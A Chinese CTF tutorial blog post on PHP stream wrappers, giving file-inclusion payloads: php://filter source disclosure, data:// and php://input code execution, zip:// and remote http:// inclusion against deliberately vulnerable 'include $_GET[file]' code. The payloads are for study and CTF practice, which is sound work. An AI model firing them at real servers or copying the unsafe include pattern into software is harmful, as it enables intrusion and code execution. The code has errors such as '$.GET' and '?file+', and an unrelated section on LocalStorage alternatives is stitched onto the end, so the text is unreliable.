PHP伪协议

本文介绍了PHP中的伪协议,包括file协议用于读取本地文件,php协议访问输入/输出流,zip、bzip2和zlib协议处理压缩文件,data协议用于数据封装,以及http和https协议的远程包含功能。这些协议在CTF竞赛中常用于安全漏洞利用,但需注意其潜在的安全风险,如allow_url_fopen和allow_url_include的配置要求。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、伪协议介绍

php伪协议,就是php支持的协议和封装协议

比较常见的php协议有:

file://    访问本地文件系统
php://     访问各个输入/输出流
data://    数据
zip://     压缩流

但是需要注意的是,当使用网络路径进行访问时,需要allow_url_fopen和allow_url_include都为ON

二、file伪协议

作用:展现本地文件系统
在CTF中一般用来读取本地文件或者执行php脚本(绝对路径和相对路径都可以),但是当导入的文件不是php文件时,仍会按照php语法进行解析。

例:使用file://伪协议去包含本地的phpinfo.php和flag.txt
源码:

<?php
$file=$.GET['file'];
include $file;

payload:

?file+file://E\phpinfo.php
?file=../flag.txt
?file=http://127.0.0.1/flag.txt

三、php伪协议

作用:访问各个输入输出流
在CTF中经常用到php://filter和php://input
php://filter: 用来读取源码(php文件源码)
php://input: 用来执行php代码(通常以post形式,post一段代码上去执行)
参数详解

参数描述
resource=<要过滤的数据流>必须项。它指定了你要筛选的过滤的数据流
read=<读链的过滤器>可选项,可以设定一个或者多个过滤器名称
write=<写链的过滤器>可选项。可以设定一个或多个过滤器名称
<;俩个链的过滤器>任何没有以read= 或write = 作为前缀的筛选器列表会视情况应用于读或者写链
转换过滤器作用
convert.base64-encode&convert.base64-decode等同于base64_encode( )和base64_decode( ) ,base64编码解码
conbert.quoted-printable-encode&convert.quoted-printable-decodequoted-printable 字符串与8-bit字符串编码解码

例:读取fildprotocol.php文件源码:

?file=php://filter/read=convert.base64-encode/resource=./fileprotocol.php

四、zip:// & bzip2:// & zlib:// 协议

作用:zip:// & bzip2:// & zlib:// 都属于压缩流,可以访问压缩文件中的子文件,不需要指定后缀名,可以修改任意后缀
1.zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
例:压缩phpinfo.txt为phpinfo.zip,将zip改为xxxx,包含里面的phpinfo.txt
源码:

<?phpinclude($.GET['file']);

payload:

?file=zip://D:\phpstudy.pro\www\php-audit\fake_protoclol\phpinfo.xxxx%23phpinfo.txt

五、data协议

注:需要allow_url_fopen和allow_url_include都为ON
作用:data://伪协议是数据封装器,传递相应格式的数据
通常可以用来执行PHP代码

用法如下:
data://text/plain,
data://text/plain;base64,

例:
源码:

<?php
$file=$.GET['file'];
include $file;

payload:

?file+data://text/plain,<?php%20phpinfo();?>
?file+data://text/plain;base64,PD9waHAlMjBwaHBpbmZvKCk7Pz4=

第二行后面是<?php%20phpinfo();?>base64编码格式

六、http://和https://协议

远程包含需要allow_url_fopen和allow_url_include都为ON
允许通过HTTP1.0的GET方法,以只读的方式访问文件或者资源

CTF中常用于远程包含

?file=http://127.0.0.1/phpinfo.txt
### 解决File协议下LocalStorage不可用的方法 在浏览器环境下,当通过`file://`协议访问网页时,默认情况下许多Web API的功能会受到限制,其中包括`LocalStorage`。这是因为出于安全考虑,大多数现代浏览器不允许在本地文件系统上使用这些API来防止潜在的安全风险[^1]。 对于希望绕过此限制的应用程序开发者来说,有几种方法可以实现类似于`LocalStorage`功能的效果: #### 使用IndexedDB作为替代方案 IndexedDB是一种更为强大的客户端数据存储解决方案,支持结构化查询以及事务处理等功能。与简单的键值对存储不同的是,它可以保存更复杂的对象图并提供更大的灵活性。由于IndexedDB并不受`file://`协议的影响,在这种场景下是一个很好的选择。 ```javascript // 打开/创建名为 'myDatabase' 的数据库版本 1 let request = indexedDB.open('myDatabase', 1); request.onupgradeneeded = function(event) { let db = event.target.result; // 创建一个名为 'files' 的对象仓库用于存储文件信息 if (!db.objectStoreNames.contains('files')) { db.createObjectStore('files', { keyPath: 'id'}); } }; request.onsuccess = function(event) { console.log("成功打开数据库"); }; ``` #### 利用LocalForage库简化操作 考虑到直接使用IndexedDB可能较为繁琐,第三方库如[LocalForage](https://localforage.github.io/localForage/)提供了更加简便易用的接口来进行持久化存储。该库不仅兼容多种底层技术(包括但不限于IndexedDB),还能够自动降级到其他可用选项,从而确保最佳性能的同时保持良好的跨平台一致性[^3]. 安装方式如下: ```bash npm install localforage ``` 基本用法示例: ```javascript import localforage from 'localforage'; async function setItem(key, value){ await localforage.setItem(key,value); } async function getItem(key){ const result = await localforage.getItem(key); return result; } ``` #### 浏览器设置调整(不推荐) 理论上可以通过修改某些特定浏览器的安全策略配置项来允许`file://`协议下的`LocalStorage`访问权限,但这通常不是一种好的实践,因为这样做可能会带来安全隐患,并且并非所有类型的浏览器都支持这样的自定义设置。因此除非是在严格控制环境内开发测试用途的小型项目里,否则不应采取这种方式解决问题.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值